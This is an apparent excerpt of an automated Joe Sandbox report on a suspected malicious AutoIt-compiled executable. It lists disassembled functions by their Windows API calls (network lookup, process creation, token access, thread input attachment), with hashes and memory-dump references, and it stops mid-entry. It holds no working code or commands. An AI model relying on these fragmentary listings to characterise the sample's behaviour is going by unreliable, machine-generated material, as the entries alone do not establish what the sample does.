                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                              • String ID:
                              • API String ID: 1378193009-0
                              • Opcode ID: 9ad27caf57b7175329e6278930f6f66d2dac226e16b368de7019a3f7b2a2ca4d
                              • Instruction ID: 753288b485e1969ab48e02703aa7aa0eb940c9a4b3986d82e769273260e858ee
                              • Opcode Fuzzy Hash: 9ad27caf57b7175329e6278930f6f66d2dac226e16b368de7019a3f7b2a2ca4d
                              • Instruction Fuzzy Hash: 3B21DD71908744AFE7329B24DC55BEBBBECFF12308F04009EE69DD6241D7745A849B51
                              Function 008F667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                              • gethostbyname.WSOCK32(?,?,?), ref: 008F66AC
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F66B7
                              • _memmove.LIBCMT ref: 008F66E4
                              • inet_ntoa.WSOCK32(?), ref: 008F66EF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                              • String ID:
                              • API String ID: 1504782959-0
                              • Opcode ID: ef5feed27e5db69dde27eb12f0f90b1188f9df0020646f306a367ff6cbd7ba78
                              • Instruction ID: 20d9541b82e1112d87580fe04881e803ab76f7458821861d6c662dd95d4e9450
                              • Opcode Fuzzy Hash: ef5feed27e5db69dde27eb12f0f90b1188f9df0020646f306a367ff6cbd7ba78
                              • Instruction Fuzzy Hash: F3114936500508AFCB04FBA8DD96DEEB7B8FF14310B148165F502E72A1EB30AE14DB62
                              Function 008D9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 008D9043
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D9055
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D906B
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D9086
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                              • Instruction ID: eba7ee8db19391cf4284538f46b8bbbc3c41f8d7b3e27ec5ec85c3b99ef84c98
                              • Opcode Fuzzy Hash: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                              • Instruction Fuzzy Hash: C4115E79900218FFDB10DFA5CC84E9DBBB4FB48310F204196E904B7250D6726E11DB90
                              Function 00881290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • DefDlgProcW.USER32(?,00000020,?), ref: 008812D8
                              • GetClientRect.USER32(?,?), ref: 008BB84B
                              • GetCursorPos.USER32(?), ref: 008BB855
                              • ScreenToClient.USER32(?,?), ref: 008BB860
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Client$CursorLongProcRectScreenWindow
                              • String ID:
                              • API String ID: 4127811313-0
                              • Opcode ID: b073c0f71179e35a2298e19162f1dc389edc38cbc25ea98c4732bc9e623ab5ec
                              • Instruction ID: 74f2553dfe9ba175e10729a9eeb7580b7670195449bfdfce3b5487e6c66db251
                              • Opcode Fuzzy Hash: b073c0f71179e35a2298e19162f1dc389edc38cbc25ea98c4732bc9e623ab5ec
                              • Instruction Fuzzy Hash: 54112535A1011DAFCF10EFA8D8899FE77B8FB05310F000466F901E7251DB30BA929BA6
                              Function 008E1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                              Download Yara Rule
                              APIs
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E166F
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E1694
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E169E
                              • Sleep.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E16D1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CounterPerformanceQuerySleep
                              • String ID:
                              • API String ID: 2875609808-0
                              • Opcode ID: 0756b77c258f17384095d7237fe7e0fbb766df9dae70cdb4793734a8b2f89d65
                              • Instruction ID: fc9f193974571f9d959fdfce59cd39a4ea5a7385b3486c454717b959a0e8c529
                              • Opcode Fuzzy Hash: 0756b77c258f17384095d7237fe7e0fbb766df9dae70cdb4793734a8b2f89d65
                              • Instruction Fuzzy Hash: C7118E31C1851DDBCF00AFA6D848AEEBB78FF1A701F044059E941F6250CB3056A0DBD6
                              Function 008B7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              • String ID:
                              • API String ID: 3016257755-0
                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                              • Instruction ID: 53767d400d4cd41554618c79c3a0b261653988b8827fd90d27f61716387f557b
                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                              • Instruction Fuzzy Hash: 8D01403604428EBBCF125E88CC018EE3F62FF99355F598515FA19A8231D237D9B1AB81
                              Function 0090B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 0090B59E
                              • ScreenToClient.USER32(?,?), ref: 0090B5B6
                              • ScreenToClient.USER32(?,?), ref: 0090B5DA
                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0090B5F5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClientRectScreen$InvalidateWindow
                              • String ID:
                              • API String ID: 357397906-0
                              • Opcode ID: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                              • Instruction ID: f05e74b1d687279704ef3c71c22d22ef04735e2ee8c22e50959381d1344e4f07
                              • Opcode Fuzzy Hash: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                              • Instruction Fuzzy Hash: 381134B5D0420DEFDB51CF99C8449EEBBB9FB08310F104166E914E3620D735AA559F50
                              Function 0090B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 0090B8FE
                              • _memset.LIBCMT ref: 0090B90D
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00947F20,00947F64), ref: 0090B93C
                              • CloseHandle.KERNEL32 ref: 0090B94E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memset$CloseCreateHandleProcess
                              • String ID:
                              • API String ID: 3277943733-0
                              • Opcode ID: e30687aadd5ad4415d315a37ee83b854c4729965549a37ec2da004a2b0eaac69
                              • Instruction ID: 7380a0aa45c8961f8ef8583518254b040ea5670628dcaa560f7bfd91c4be7e0d
                              • Opcode Fuzzy Hash: e30687aadd5ad4415d315a37ee83b854c4729965549a37ec2da004a2b0eaac69
                              • Instruction Fuzzy Hash: 49F089B55583087FF32027E5AC05F7BBA9CEB0A754F000460BF08D5192D7714D0497A9
                              Function 008E6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32(?), ref: 008E6E88
                                • Part of subcall function 008E794E: _memset.LIBCMT ref: 008E7983
                              • _memmove.LIBCMT ref: 008E6EAB
                              • _memset.LIBCMT ref: 008E6EB8
                              • LeaveCriticalSection.KERNEL32(?), ref: 008E6EC8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalSection_memset$EnterLeave_memmove
                              • String ID:
                              • API String ID: 48991266-0
                              • Opcode ID: d03a4d6946ae4f8f2b5d2bf276619f3d3576cfe400702c93d5ac6381f82cb51e
                              • Instruction ID: 2ff563a280a9425f64dc05b703cd5e975ba19508b1b4c3c01211b0555b504252
                              • Opcode Fuzzy Hash: d03a4d6946ae4f8f2b5d2bf276619f3d3576cfe400702c93d5ac6381f82cb51e
                              • Instruction Fuzzy Hash: 63F0543A104200ABCF116F59DC85A49BB29FF46320F048061FE089E217C731E911DBB5
                              Function 0090C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0088134D
                                • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088135C
                                • Part of subcall function 008812F3: BeginPath.GDI32(?), ref: 00881373
                                • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088139C
                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0090C030
                              • LineTo.GDI32(00000000,?,?), ref: 0090C03D
                              • EndPath.GDI32(00000000), ref: 0090C04D
                              • StrokePath.GDI32(00000000), ref: 0090C05B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                              • String ID:
                              • API String ID: 1539411459-0
                              • Opcode ID: c3d69b134f6bf8e75a6385e90c25df539864f2c5917e96e0ec04e26e3ee1a297
                              • Instruction ID: 671a20c3f10354cf89c168491093917311302aa815b035f4d8a4f7fba35a30fd
                              • Opcode Fuzzy Hash: c3d69b134f6bf8e75a6385e90c25df539864f2c5917e96e0ec04e26e3ee1a297
                              • Instruction Fuzzy Hash: 64F0B832018219BFDB226F54AC0AFCE3FA8AF0A310F048100FA11614E287B51661EBE6
                              Function 008DA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008DA399
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA3AC
                              • GetCurrentThreadId.KERNEL32 ref: 008DA3B3
                              • AttachThreadInput.USER32(00000000), ref: 008DA3BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                              • String ID:
                              • API String ID: 2710830443-0
                              • Opcode ID: 8bd6403736d547c95e05bc4bd7b5be903607dc2d767f22ede7fcd3b786fd0f54
                              • Instruction ID: 00cf035f16c98847c94630c4ea7668f2187005d3baabfbc3e1209d2ed75938ba
                              • Opcode Fuzzy Hash: 8bd6403736d547c95e05bc4bd7b5be903607dc2d767f22ede7fcd3b786fd0f54
                              • Instruction Fuzzy Hash: EAE0393114932CBADB245BA2DC0CED73F1CFF167A1F008125F508C4560CA72C640EBA0
                              Function 00882218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                              Download Yara Rule
                              APIs
                              • GetSysColor.USER32(00000008), ref: 00882231
                              • SetTextColor.GDI32(?,000000FF), ref: 0088223B
                              • SetBkMode.GDI32(?,00000001), ref: 00882250
                              • GetStockObject.GDI32(00000005), ref: 00882258
                              • GetWindowDC.USER32(?,00000000), ref: 008BC0D3
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 008BC0E0
                              • GetPixel.GDI32(00000000,?,00000000), ref: 008BC0F9
                              • GetPixel.GDI32(00000000,00000000,?), ref: 008BC112
                              • GetPixel.GDI32(00000000,?,?), ref: 008BC132
                              • ReleaseDC.USER32(?,00000000), ref: 008BC13D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                              • String ID:
                              • API String ID: 1946975507-0
                              • Opcode ID: 15df1d7a2d2dd0e8c4e45ff5dded537f8f9c0e7b9a839cb33ae367b6a0159b7d
                              • Instruction ID: f92745601baef6bc5590dad35efcb25da48abddcf3b69455c00245afa14cb4e6
                              • Opcode Fuzzy Hash: 15df1d7a2d2dd0e8c4e45ff5dded537f8f9c0e7b9a839cb33ae367b6a0159b7d
                              • Instruction Fuzzy Hash: A1E06D32118244EEDFB15F68FC0D7E87B14FB05336F008366FA69980E187714A90EB11
                              Function 008D8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 008D8C63
                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,008D882E), ref: 008D8C6A
                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008D882E), ref: 008D8C77
                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,008D882E), ref: 008D8C7E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CurrentOpenProcessThreadToken
                              • String ID:
                              • API String ID: 3974789173-0
                              • Opcode ID: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                              • Instruction ID: 00a91701c4ac58f54e635b0223bcb8564acb5719eb4e6d72e87f57029692daca
                              • Opcode Fuzzy Hash: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                              • Instruction Fuzzy Hash: 59E08636666211DFD7705FB06D0CB563BBCFF50BA2F044828B245D9040DA348545EB71
                              Function 008C2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                              Download Yara Rule
                              APIs
                              • GetDesktopWindow.USER32 ref: 008C2187
                              • GetDC.USER32(00000000), ref: 008C2191
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008C21B1
                              • ReleaseDC.USER32(?), ref: 008C21D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: 201b76a954a9f340f8002164829366363f909c75e30f7b12b952621642c211f1
                              • Instruction ID: 4bb31af462a836cf4dc669b3aad38e97f7a77ba69e106c0a94633c358a1887db
                              • Opcode Fuzzy Hash: 201b76a954a9f340f8002164829366363f909c75e30f7b12b952621642c211f1
                              • Instruction Fuzzy Hash: FFE0E575814618EFDF51AFA4C818AAD7BB1FB4C350F108429F95AD7660CB399241AF40
                              Function 008C219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • GetDesktopWindow.USER32 ref: 008C219B
                              • GetDC.USER32(00000000), ref: 008C21A5
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008C21B1
                              • ReleaseDC.USER32(?), ref: 008C21D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: fc02075a160a274533bc807fbfab0d59bae82ffad2f3a84f69e0164cba4a7fb7
                              • Instruction ID: 24862c23ef5b2a967b2dcd3cf80ed20b4155ddce2eff410a486da36ba510c2a8
                              • Opcode Fuzzy Hash: fc02075a160a274533bc807fbfab0d59bae82ffad2f3a84f69e0164cba4a7fb7
                              • Instruction Fuzzy Hash: F3E012B5814608AFCF61AFB4C818AAD7BF1FF4C310F108029F95AE7620CB399241AF40
                              Function 008DB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                              Download Yara Rule
                              APIs
                              • OleSetContainedObject.OLE32(?,00000001), ref: 008DB981
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ContainedObject
                              • String ID: AutoIt3GUI$Container
                              • API String ID: 3565006973-3941886329
                              • Opcode ID: e34137f79c41247b16231c3736479528a628a4eaf7166b6756ed9e137921e9be
                              • Instruction ID: 385def276fb0c5e1ddb3fa0db7ff1b400ed7baae93972256ebb6cec51eb75a60
                              • Opcode Fuzzy Hash: e34137f79c41247b16231c3736479528a628a4eaf7166b6756ed9e137921e9be
                              • Instruction Fuzzy Hash: B0914A74600205EFDB24DF68C884B6ABBE8FF49710F15856EE94ACB791EB70E840CB50
                              Function 008EB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • __wcsnicmp.LIBCMT ref: 008EB298
                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008EB361
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                              • String ID: LPT
                              • API String ID: 3222508074-1350329615
                              • Opcode ID: 8d2edc968271a0802cbfff937933a2690544fd6fd1b7de7ad1371226711657a5
                              • Instruction ID: 29930a8d20643bfbf1d6240b50f9a776b40aabe9e78ec3aa0f765e2c95add944
                              • Opcode Fuzzy Hash: 8d2edc968271a0802cbfff937933a2690544fd6fd1b7de7ad1371226711657a5
                              • Instruction Fuzzy Hash: BC617E75A00259AFCB14EB99C882EAEB7F4FF09310F15406AF546EB391DB70AE40CB51
                              Function 00892AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                              Download Yara Rule
                              APIs
